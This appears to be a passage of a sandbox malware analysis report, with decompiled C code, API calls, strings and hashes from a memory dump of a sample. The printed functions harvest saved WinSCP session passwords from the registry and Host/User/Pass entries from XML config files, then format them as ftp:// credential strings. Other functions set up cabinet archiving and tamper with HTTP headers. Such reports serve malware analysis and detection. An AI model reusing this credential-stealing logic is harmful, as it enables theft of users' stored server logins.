0x004071a8
0x004071ad
0x004071af
0x004071b1
0x004071b1
0x004071b1
0x004071b1
0x004071af
0x004071b8
0x00000000
0x004071b8
0x00000000
0x00407178
0x00407171
0x0040713a
0x00407012
0x0040701a
0x00000000

Strings

Host, xrefs: 0040708D
Port, xrefs: 004070BC
Password, xrefs: 00407115
ftp://%s:%s@%s:%u, xrefs: 0040718D
*.xml, xrefs: 00407012
User, xrefs: 004070EB
FavoriteItem, xrefs: 00407070

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
String ID: *.xml$FavoriteItem$Host$Password$Port$User$ftp://%s:%s@%s:%u
API String ID: 1075381090-4126475539
Opcode ID: 800e3c33a2f1f7326797e8889f0a0853e19ce156c94fae929727c172f6cbfdcd
Instruction ID: f729dd802e85921fa6b0a08b29b2cf87ef067dd3d22d64b7412b4332596ce7c4
Opcode Fuzzy Hash: 800e3c33a2f1f7326797e8889f0a0853e19ce156c94fae929727c172f6cbfdcd
Instruction Fuzzy Hash: B4618D31A083029BD710DF65C844A6B77A8AF84748F04497EF845AB2E1D778E945CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 0040643F, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 158
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040643F(void* __edx) {
				void* _v8;
				char* _v12;
				int _v16;
				signed int _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				short _v572;
				void* __edi;
				void* __esi;
				long _t61;
				intOrPtr _t63;
				int _t69;
				intOrPtr _t71;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t76;
				intOrPtr _t77;
				int* _t79;
				intOrPtr _t80;
				void* _t90;
				char* _t92;
				void* _t93;
				void* _t94;

				_t86 = __edx;
				_t79 = 0;
				E004098AA( &_v36,  &_v36, 0, 8);
				_t90 = HeapAlloc( *0x41a570, 8, 0xc20);
				_v28 = _t90;
				if(_t90 == 0) {
					L23:
					_t99 = _v32 - _t79;
					if(_v32 > _t79) {
						E00412508(_t52, _v36, _t86, _t99, L"WinSCP");
					}
					return E004097F7(_v36);
				} else {
					_t3 = _t90 + 0x3fc; // 0x3fc
					_v48 = 0x80000001;
					_v44 = 0x80000002;
					_v12 = _t3;
					_v20 = 0;
					do {
						if(RegOpenKeyExW( *(_t93 + _v20 * 4 - 0x2c), L"SOFTWARE\\martin prikryl\\winscp 2\\sessions", _t79, 8,  &_v8) != 0) {
							goto L21;
						}
						_v24 = _t79;
						_v16 = 0x104;
						_t61 = RegEnumKeyExW(_v8, _t79,  &_v572,  &_v16, _t79, _t79, _t79, _t79);
						while(_t61 == 0) {
							_v24 = _v24 + 1;
							_t63 = E0040ED7B(0xff, _t90, _v8,  &_v572, L"hostname");
							_v40 = _t63;
							__eflags = _t63 - 0xffffffff;
							if(_t63 == 0xffffffff) {
								L18:
								_v16 = 0x104;
								_t61 = RegEnumKeyExW(_v8, _v24,  &_v572,  &_v16, _t79, _t79, _t79, _t79);
								_t90 = _v28;
								continue;
							}
							__eflags = _t63 - _t79;
							if(_t63 <= _t79) {
								goto L18;
							}
							_t80 = E0040ED7B(0xff, _t90 + 0x1fe, _v8,  &_v572, L"username");
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								L17:
								_t79 = 0;
								__eflags = 0;
								goto L18;
							}
							__eflags = _t80;
							if(_t80 <= 0) {
								goto L17;
							}
							_t92 = _v12;
							_t69 = E0040ED7B(0xff, _t92, _v8,  &_v572, L"password");
							_v16 = _t69;
							__eflags = _t69 - 0xffffffff;
							if(_t69 == 0xffffffff) {
								goto L17;
							}
							__eflags = _t69;
							if(_t69 <= 0) {
								goto L17;
							}
							_t71 = E00406384(_t86, _t92, _t80 + _v40);
							__eflags = _t71;
							if(_t71 <= 0) {
								goto L17;
							}
							_t73 = E0040EDD3(_t82, _v8,  &_v572, L"portnumber");
							__eflags = _t73 - 1;
							if(_t73 < 1) {
								L13:
								_t73 = 0x15;
								L14:
								_push(_t73);
								_t74 = _v28;
								_push(_t74);
								_t82 = _t92;
								_push(_t92);
								_push(_t74 + 0x1fe);
								_t86 = 0x311;
								_t76 = E0040A4B7(_t74 + 0x1fe, 0x311, _t92 + 0x1fe, L"ftp://%s:%s@%s:%u\n");
								_t94 = _t94 + 0x14;
								__eflags = _t76;
								if(_t76 > 0) {
									_t82 =  &_v36;
									_t77 = E00409B2A(_t76,  &_v36, _t92 + 0x1fe);
									__eflags = _t77;
									if(_t77 != 0) {
										_t35 =  &_v32;
										 *_t35 = _v32 + 1;
										__eflags =  *_t35;
									}
								}
								goto L17;
							}
							__eflags = _t73 - 0xffff;
							if(_t73 <= 0xffff) {
								goto L14;
							}
							goto L13;
						}
						RegCloseKey(_v8);
						L21:
						_v20 = _v20 + 1;
					} while (_v20 < 2);
					_t52 = E004097F7(_t90);
					goto L23;
				}
			}

0x0040643f
0x0040644d
0x00406454
0x0040646c
0x0040646e
0x00406473
0x0040661d
0x0040661d
0x00406620
0x0040662a
0x0040662a
0x0040663b
0x00406479
0x00406479
0x0040647f
0x00406486
0x0040648d
0x00406490
0x00406493
0x004064ae
0x00000000
0x00000000
0x004064c7
0x004064ca
0x004064d1
0x004065f9
0x004064dc
0x004064f3
0x004064f8
0x004064fb
0x004064fe
0x004065d4
0x004065e6
0x004065f0
0x004065f6
0x00000000
0x004065f6
0x00406504
0x00406506
0x00000000
0x00000000
0x00406526
0x00406528
0x0040652b
0x004065d2
0x004065d2
0x004065d2
0x00000000
0x004065d2
0x00406531
0x00406533
0x00000000
0x00000000
0x00406539
0x0040654b
0x00406550
0x00406553
0x00406556
0x00000000
0x00000000
0x00406558
0x0040655a
0x00000000
0x00000000
0x00406564
0x00406569
0x0040656b
0x00000000
0x00000000
0x0040657c
0x00406581
0x00406584
0x0040658d
0x0040658f
0x00406590
0x00406590
0x00406591
0x00406594
0x00406595
0x00406597
0x0040659d
0x004065a3
0x004065ae
0x004065b3
0x004065b6
0x004065b8
0x004065c3
0x004065c6
0x004065cb
0x004065cd
0x004065cf
0x004065cf
0x004065cf
0x004065cf
0x004065cd
0x00000000
0x004065b8
0x00406586
0x0040658b
0x00000000
0x00000000
0x00000000
0x0040658b
0x00406604
0x0040660a
0x0040660a
0x0040660d
0x00406618
0x00000000
0x00406618

APIs

HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00406466
RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\martin prikryl\winscp 2\sessions,00000000,00000008,?), ref: 004064A6
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004064D1
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,hostname), ref: 004065F0
RegCloseKey.ADVAPI32(?), ref: 00406604

Strings

hostname, xrefs: 004064DF
WinSCP, xrefs: 00406625
ftp://%s:%s@%s:%u, xrefs: 0040659E
portnumber, xrefs: 0040656D
SOFTWARE\martin prikryl\winscp 2\sessions, xrefs: 0040649D
password, xrefs: 0040653C
username, xrefs: 0040650C

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Enum$AllocCloseHeapOpen
String ID: SOFTWARE\martin prikryl\winscp 2\sessions$WinSCP$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
API String ID: 2215211458-3245696038
Opcode ID: 8bdba5e065b30dbc9030e85f0af6db04464695886fa7e2566bfce0e6d8dc20b5
Instruction ID: 30a5285e5c4baa300f1dc1d0c84335af07466dc0796cf7ab67906384150b5606
Opcode Fuzzy Hash: 8bdba5e065b30dbc9030e85f0af6db04464695886fa7e2566bfce0e6d8dc20b5
Instruction Fuzzy Hash: 39516D71900219BFEB10AFA5DD85AEFB6BCEF04304F10457AF512B22E1D7785E658B28

Uniqueness

Uniqueness Score: -1.00%

Function 0040E223, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E223() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t18;

				_t14 =  *0x41a580; // 0x0
				if(_t14 != 0) {
					L9:
					 *0x41a580 =  *0x41a580 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x41a57c = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x419ba4 = GetProcAddress(_t2, "FCICreate");
						 *0x41a56c = GetProcAddress( *0x41a57c, "FCIAddFile");
						 *0x4192cc = GetProcAddress( *0x41a57c, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x41a57c, "FCIDestroy");
						 *0x41a574 = _t7;
						_t16 =  *0x419ba4; // 0x0
						if(_t16 == 0) {
							L7:
							FreeLibrary( *0x41a57c);
							goto L8;
						} else {
							_t17 =  *0x41a56c; // 0x0
							if(_t17 == 0) {
								goto L7;
							} else {
								_t18 =  *0x4192cc; // 0x0
								if(_t18 == 0 || _t7 == 0) {
									goto L7;
								} else {
									_t9 = HeapCreate(0, 0x80000, 0);
									 *0x4191c4 = _t9;
									if(_t9 != 0) {
										goto L9;
									} else {
										goto L7;
									}
								}
							}
						}
					}
				}
			}

0x0040e226
0x0040e22c
0x0040e2d7
0x0040e2d7
0x0040e2e0
0x0040e232
0x0040e237
0x0040e23d
0x0040e244
0x0040e2d3
0x0040e2d6
0x0040e24a
0x0040e264
0x0040e276
0x0040e288
0x0040e28d
0x0040e28f
0x0040e295
0x0040e29b
0x0040e2c7
0x0040e2cd
0x00000000
0x0040e29d
0x0040e29d
0x0040e2a3
0x00000000
0x0040e2a5
0x0040e2a5
0x0040e2ab
0x00000000
0x0040e2b1
0x0040e2b8
0x0040e2be
0x0040e2c5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e2c5
0x0040e2ab
0x0040e2a3
0x0040e29b
0x0040e244

APIs

LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040E30A,?,0040E52E,?,?,00000000,?,?), ref: 0040E237
GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040E257
GetProcAddress.KERNEL32(FCIAddFile), ref: 0040E269
GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040E27B
GetProcAddress.KERNEL32(FCIDestroy), ref: 0040E28D
HeapCreate.KERNEL32(00000000,00080000,00000000,0040E52E,?,?,00000000,?,?), ref: 0040E2B8
FreeLibrary.KERNEL32(0040E52E,?,?,00000000,?,?), ref: 0040E2CD

Strings

FCIDestroy, xrefs: 0040E27D
FCIAddFile, xrefs: 0040E259
cabinet.dll, xrefs: 0040E232
FCICreate, xrefs: 0040E251
FCIFlushCabinet, xrefs: 0040E26B

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$CreateFreeHeapLoad
String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
API String ID: 2040708800-1163896595
Opcode ID: c826c1696955950314d21eed4bc06ee3e2b7d1adfcf57577c81d661b81444df7
Instruction ID: 42e6ffbcc0e077c243f06d100030672c496687fc0664d38dd4572b2fcae4638f
Opcode Fuzzy Hash: c826c1696955950314d21eed4bc06ee3e2b7d1adfcf57577c81d661b81444df7
Instruction Fuzzy Hash: CF111E34D4A610BECB119F76FD089A63BA6B749B503648D7BE500B22F0D77A4461DF0E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E5C, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E5C(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				intOrPtr* _v536;
				char* _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v596;
				intOrPtr* _v600;
				char _v608;
				intOrPtr _v612;
				char _v616;
				intOrPtr* _v620;
				intOrPtr _v624;
				intOrPtr* _v632;
				char _v636;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr* _t77;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t86;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr* _t124;
				intOrPtr* _t128;
				intOrPtr* _t129;
				signed int _t134;
				void* _t136;

				_t136 = (_t134 & 0xfffffff8) - 0x234;
				if(E0040B635( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L45:
					return 1;
				}
				_t139 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t128 = E00410075( &_v524, __eflags,  &_v524);
					_v536 = _t128;
					__eflags = _t128;
					if(_t128 == 0) {
						goto L45;
					}
					_t65 =  *((intOrPtr*)( *_t128 + 0x90))(_t128, L"/*/*/Server",  &_v560);
					__eflags = _t65;
					if(_t65 != 0) {
						L44:
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						goto L45;
					}
					_t68 = _v572;
					_t69 =  *((intOrPtr*)( *_t68 + 0x24))(_t68,  &_v576);
					__eflags = _t69;
					if(_t69 != 0) {
						L43:
						_t70 = _v580;
						 *((intOrPtr*)( *_t70 + 8))(_t70);
						goto L44;
					} else {
						goto L6;
					}
					do {
						L6:
						_t72 = _v584;
						_t106 =  *_t72;
						_t73 =  *((intOrPtr*)( *_t72 + 0x94))(_t72, L"Host",  &_v564);
						__eflags = _t73;
						if(_t73 != 0) {
							_v584 = 0;
						} else {
							_v584 = E004100F7(_t106,  &_v576);
						}
						_t74 = _v596;
						_t107 =  *_t74;
						_t75 =  *((intOrPtr*)( *_t74 + 0x94))(_t74, L"Port",  &_v568);
						__eflags = _t75;
						if(_t75 != 0) {
							_v600 = 0;
						} else {
							_v600 = E004100F7(_t107,  &_v580);
						}
						_t76 = _v608;
						_t108 =  *_t76;
						_t77 =  *((intOrPtr*)( *_t76 + 0x94))(_t76, L"User",  &_v572);
						__eflags = _t77;
						if(_t77 != 0) {
							_t124 = 0;
							__eflags = 0;
						} else {
							_t124 = E004100F7(_t108,  &_v584);
						}
						_t78 = _v620;
						_t109 =  *_t78;
						_t79 =  *((intOrPtr*)( *_t78 + 0x94))(_t78, L"Pass",  &_v596);
						__eflags = _t79;
						if(_t79 != 0) {
							_t129 = 0;
							__eflags = 0;
						} else {
							_t129 = E004100F7(_t109,  &_v608);
						}
						_t80 = _v620;
						__eflags = _t80;
						if(_t80 != 0) {
							__eflags =  *_t80;
							if( *_t80 == 0) {
								L34:
								__imp__#6(_v620);
								goto L35;
							}
							__eflags = _t124;
							if(_t124 == 0) {
								goto L34;
							}
							__eflags =  *_t124;
							if( *_t124 == 0) {
								goto L34;
							}
							__eflags = _t129;
							if(_t129 == 0) {
								goto L34;
							}
							__eflags =  *_t129;
							if( *_t129 == 0) {
								goto L34;
							}
							_t85 = _v624;
							__eflags = _v624;
							if(_v624 == 0) {
								_t86 = 0;
								__eflags = 0;
							} else {
								_t86 = E00409E66(_t85);
							}
							__eflags = _t86 - 1;
							if(_t86 < 1) {
								L29:
								_t86 = 0x15;
								goto L30;
							} else {
								__eflags = _t86 - 0xffff;
								if(_t86 <= 0xffff) {
									L30:
									_push(_t86);
									_push(_v620);
									_push(_t129);
									_v616 = 0;
									_t88 = E0040A532( &_v616, L"ftp://%s:%s@%s:%u\n", _t124);
									_t136 = _t136 + 0x18;
									__eflags = _t88;
									if(_t88 > 0) {
										_t90 = E00409B2A(_t88, _a4, _v616);
										__eflags = _t90;
										if(_t90 != 0) {
											_t91 = _a4;
											_t44 = _t91 + 4;
											 *_t44 =  *((intOrPtr*)(_t91 + 4)) + 1;
											__eflags =  *_t44;
										}
									}
									E004097F7(_v616);
									goto L34;
								}
								goto L29;
							}
						}
						L35:
						__eflags = _v624;
						if(_v624 != 0) {
							__imp__#6(_v624);
						}
						__eflags = _t124;
						if(_t124 != 0) {
							__imp__#6(_t124);
						}
						__eflags = _t129;
						if(_t129 != 0) {
							__imp__#6(_t129);
						}
						_t81 = _v632;
						 *((intOrPtr*)( *_t81 + 8))(_t81);
						_t83 = _v632;
						_t84 =  *((intOrPtr*)( *_t83 + 0x24))(_t83,  &_v636);
						__eflags = _t84;
					} while (_t84 == 0);
					_t128 = _v612;
					goto L43;
				}
				_v560 = L"*.xml";
				E0040B4D8( &_v524,  &_v560, _t139, 1, 5, E00405E5C, _a4, 0, 0, 0);
				goto L45;
			}

0x00405e62
0x00405e7d
0x00406097
0x0040609f
0x0040609f
0x00405e83
0x00405e86
0x00405ebd
0x00405ec1
0x00405ec5
0x00405ec7
0x00000000
0x00000000
0x00405eda
0x00405ee0
0x00405ee2
0x00406091
0x00406094
0x00000000
0x00406094
0x00405ee8
0x00405ef4
0x00405ef7
0x00405ef9
0x00406087
0x00406087
0x0040608e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405eff
0x00405eff
0x00405eff
0x00405f03
0x00405f10
0x00405f16
0x00405f18
0x00405f29
0x00405f1a
0x00405f23
0x00405f23
0x00405f2d
0x00405f31
0x00405f3e
0x00405f44
0x00405f46
0x00405f57
0x00405f48
0x00405f51
0x00405f51
0x00405f5b
0x00405f5f
0x00405f6c
0x00405f72
0x00405f74
0x00405f83
0x00405f83
0x00405f76
0x00405f7f
0x00405f7f
0x00405f85
0x00405f89
0x00405f96
0x00405f9c
0x00405f9e
0x00405fad
0x00405fad
0x00405fa0
0x00405fa9
0x00405fa9
0x00405faf
0x00405fb3
0x00405fb5
0x00405fbb
0x00405fbe
0x00406032
0x00406036
0x00000000
0x00406036
0x00405fc0
0x00405fc2
0x00000000
0x00000000
0x00405fc4
0x00405fc7
0x00000000
0x00000000
0x00405fc9
0x00405fcb
0x00000000
0x00000000
0x00405fcd
0x00405fd0
0x00000000
0x00000000
0x00405fd2
0x00405fd6
0x00405fd8
0x00405fe1
0x00405fe1
0x00405fda
0x00405fda
0x00405fda
0x00405fe3
0x00405fe6
0x00405fef
0x00405ff1
0x00000000
0x00405fe8
0x00405fe8
0x00405fed
0x00405ff2
0x00405ff2
0x00405ff3
0x00405ffb
0x00406003
0x00406007
0x0040600c
0x0040600f
0x00406011
0x0040601a
0x0040601f
0x00406021
0x00406023
0x00406026
0x00406026
0x00406026
0x00406026
0x00406021
0x0040602d
0x00000000
0x0040602d
0x00000000
0x00405fed
0x00405fe6
0x0040603c
0x0040603c
0x00406040
0x00406046
0x00406046
0x0040604c
0x0040604e
0x00406051
0x00406051
0x00406057
0x00406059
0x0040605c
0x0040605c
0x00406062
0x00406069
0x0040606c
0x00406078
0x0040607b
0x0040607b
0x00406083
0x00000000
0x00406083
0x00405ea1
0x00405ea9
0x00000000

Strings

Host, xrefs: 00405F0A
Port, xrefs: 00405F38
ftp://%s:%s@%s:%u, xrefs: 00405FFD
*.xml, xrefs: 00405EA1
User, xrefs: 00405F66
Pass, xrefs: 00405F90
/*/*/Server, xrefs: 00405ED4

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
String ID: *.xml$/*/*/Server$Host$Pass$Port$User$ftp://%s:%s@%s:%u
API String ID: 1075381090-553961098
Opcode ID: de0e0347b45dc37dadd9a3df54c9eb0ca660de002745cf8317f03369b2f122ad
Instruction ID: af0a7c8d25671063b214f6480466bc12bacc176a869f1f943aa692b72e7dd54f
Opcode Fuzzy Hash: de0e0347b45dc37dadd9a3df54c9eb0ca660de002745cf8317f03369b2f122ad
Instruction Fuzzy Hash: 5E618B71204342AFC710EF65C88496BB7E8EF88348F04493EF586A72A1D779DD45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00413618, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413618(void* __ecx, void* __edx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v73;
				intOrPtr _v76;
				signed int _v116;
				char _v121;
				void* __ebx;
				void* __esi;
				signed char _t76;
				signed int _t79;
				intOrPtr _t80;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t94;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t101;
				signed char* _t102;
				signed int _t103;
				signed int _t108;
				intOrPtr _t112;
				signed int _t126;
				signed int _t132;

				_v72 = _v72 | 0xffffffff;
				_t105 =  &_v60;
				if(E00413547( &_v60, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
					L22:
					E004047CF( &_v60);
					return _v72;
				}
				_t76 = E00404065(__edx, _t105);
				_v64 = _t76;
				if((_t76 & 0x00000001) == 0) {
					__eflags = _t76 & 0x00000002;
					if((_t76 & 0x00000002) == 0) {
						L17:
						__eflags = _v64 & 0x00000004;
						if((_v64 & 0x00000004) == 0) {
							goto L22;
						}
						 *_a8 = _v28;
						 *_a12 = _v24;
						EnterCriticalSection(0x41aa38);
						_t124 = _a4;
						_t79 = E00412CBF(_a4);
						__eflags = _t79 - 0xffffffff;
						if(_t79 != 0xffffffff) {
							L20:
							_t80 =  *0x41aa50; // 0x0
							_t126 = _t79 * 0x24;
							__eflags = _t126;
							E004097F7( *((intOrPtr*)(_t126 + _t80 + 8)));
							_t112 =  *0x41aa50; // 0x0
							 *((intOrPtr*)(_t126 + _t112 + 8)) = _v32;
							L21:
							LeaveCriticalSection(0x41aa38);
							goto L22;
						}
						_t79 = E00412CE5(_t79, _t124);
						__eflags = _t79 - 0xffffffff;
						if(_t79 == 0xffffffff) {
							goto L21;
						}
						goto L20;
					}
					_v68 = _v68 & 0x00000000;
					_v73 = 1;
					__eflags = _v16 - 1;
					if(_v16 != 1) {
						L9:
						HttpAddRequestHeadersA(_a4, "Accept-Encoding: identity\r\n", 0xffffffff, 0xa0000000);
						HttpAddRequestHeadersA(_a4, "TE:\r\n", 0xffffffff, 0x80000000);
						HttpAddRequestHeadersA(_a4, "If-Modified-Since:\r\n", 0xffffffff, 0x80000000);
						_t108 = _v116;
						L10:
						EnterCriticalSection(0x41aa38);
						__eflags = _v121;
						if(_v121 == 0) {
							L14:
							E00404821(_v64, _v68);
							__eflags = _t108;
							if(_t108 != 0) {
								E0040AA7C(_t108);
							}
							L16:
							LeaveCriticalSection(0x41aa38);
							goto L17;
						}
						_t130 = _a4;
						_t89 = E00412CBF(_a4);
						__eflags = _t89 - 0xffffffff;
						if(_t89 != 0xffffffff) {
							L13:
							_t90 =  *0x41aa50; // 0x0
							_t132 = _t89 * 0x24;
							E00404821( *((intOrPtr*)(_t90 + _t132 + 0x10)),  *((intOrPtr*)(_t90 + _t132 + 0xc)));
							_t94 =  *0x41aa50; // 0x0
							E004097F7( *((intOrPtr*)(_t132 + _t94 + 0x14)));
							_t96 =  *0x41aa50; // 0x0
							 *(_t132 + _t96 + 0x14) =  *(_t132 + _t96 + 0x14) & 0x00000000;
							_t97 =  *0x41aa50; // 0x0
							 *(_t132 + _t97 + 0x1c) =  *(_t132 + _t97 + 0x1c) & 0x00000000;
							_t98 =  *0x41aa50; // 0x0
							 *(_t132 + _t98 + 0x18) =  *(_t132 + _t98 + 0x18) | 0xffffffff;
							_t99 =  *0x41aa50; // 0x0
							 *((intOrPtr*)(_t132 + _t99 + 0xc)) = _v76;
							_t100 =  *0x41aa50; // 0x0
							 *((intOrPtr*)(_t132 + _t100 + 0x10)) = _v72;
							_t101 =  *0x41aa50; // 0x0
							 *(_t132 + _t101 + 0x20) = _t108;
							goto L16;
						}
						_t89 = E00412CE5(_t89, _t130);
						__eflags = _t89 - 0xffffffff;
						if(_t89 == 0xffffffff) {
							goto L14;
						}
						goto L13;
					}
					_t102 = _v20;
					__eflags =  *_t102 & 0x00000003;
					if(( *_t102 & 0x00000003) == 0) {
						goto L9;
					}
					_t103 = E00404A58(_t102,  &_v60);
					_t108 = _t103;
					__eflags = _t108;
					if(_t108 != 0) {
						_v72 = 1;
					} else {
						_v73 = _t103;
					}
					goto L10;
				} else {
					SetLastError(0x2f78);
					_v72 = _v72 & 0x00000000;
					goto L22;
				}
			}

0x00413624
0x00413633
0x00413641
0x004137f9
0x004137fd
0x0041380c
0x0041380c
0x00413649
0x0041364e
0x00413654
0x00413670
0x00413672
0x00413799
0x00413799
0x0041379e
0x00000000
0x00000000
0x004137a7
0x004137b1
0x004137b3
0x004137b9
0x004137bc
0x004137c1
0x004137c4
0x004137d1
0x004137d3
0x004137d8
0x004137d8
0x004137df
0x004137e8
0x004137ee
0x004137f2
0x004137f3
0x00000000
0x004137f3
0x004137c7
0x004137cc
0x004137cf
0x00000000
0x00000000
0x00000000
0x004137cf
0x00413678
0x00413680
0x00413685
0x00413689
0x004136af
0x004136c4
0x004136d6
0x004136e3
0x004136e5
0x004136e9
0x004136ea
0x004136f0
0x004136f5
0x0041377b
0x00413783
0x00413788
0x0041378a
0x0041378d
0x0041378d
0x00413792
0x00413793
0x00000000
0x00413793
0x004136fb
0x004136fe
0x00413703
0x00413706
0x00413713
0x00413715
0x0041371a
0x00413725
0x0041372a
0x00413733
0x00413738
0x0041373d
0x00413742
0x00413747
0x0041374c
0x00413751
0x00413756
0x0041375f
0x00413763
0x0041376c
0x00413770
0x00413775
0x00000000
0x00413775
0x00413709
0x0041370e
0x00413711
0x00000000
0x00000000
0x00000000
0x00413711
0x0041368b
0x0041368f
0x00413692
0x00000000
0x00000000
0x00413698
0x0041369d
0x0041369f
0x004136a1
0x004136a9
0x004136a3
0x004136a3
0x004136a3
0x00000000
0x00413656
0x0041365b
0x00413661
0x00000000
0x00413661

APIs

SetLastError.KERNEL32(00002F78), ref: 0041365B
EnterCriticalSection.KERNEL32(0041AA38), ref: 004136EA
LeaveCriticalSection.KERNEL32(0041AA38,?), ref: 00413793
EnterCriticalSection.KERNEL32(0041AA38), ref: 004137B3
LeaveCriticalSection.KERNEL32(0041AA38,?), ref: 004137F3

Strings

If-Modified-Since:, xrefs: 004136DB
TE:, xrefs: 004136CE
Accept-Encoding: identity, xrefs: 004136BC

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID: Accept-Encoding: identity$If-Modified-Since:$TE:
API String ID: 486337731-293905274
Opcode ID: 33f713bbdb83d50b8c403e7e229795024a9561d0fec858e20a63a71a0b185156
Instruction ID: 1cd726cbec2ef1576728a0196138e0f80e3f9181544a3ce7a3713ae4c56018a4
Opcode Fuzzy Hash: 33f713bbdb83d50b8c403e7e229795024a9561d0fec858e20a63a71a0b185156
Instruction Fuzzy Hash: 2751CA711043009FC721DF28DD85AAA7BE4BF45369F00862EF9A5A73E1C7389D55CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00414C47, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00414C47(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
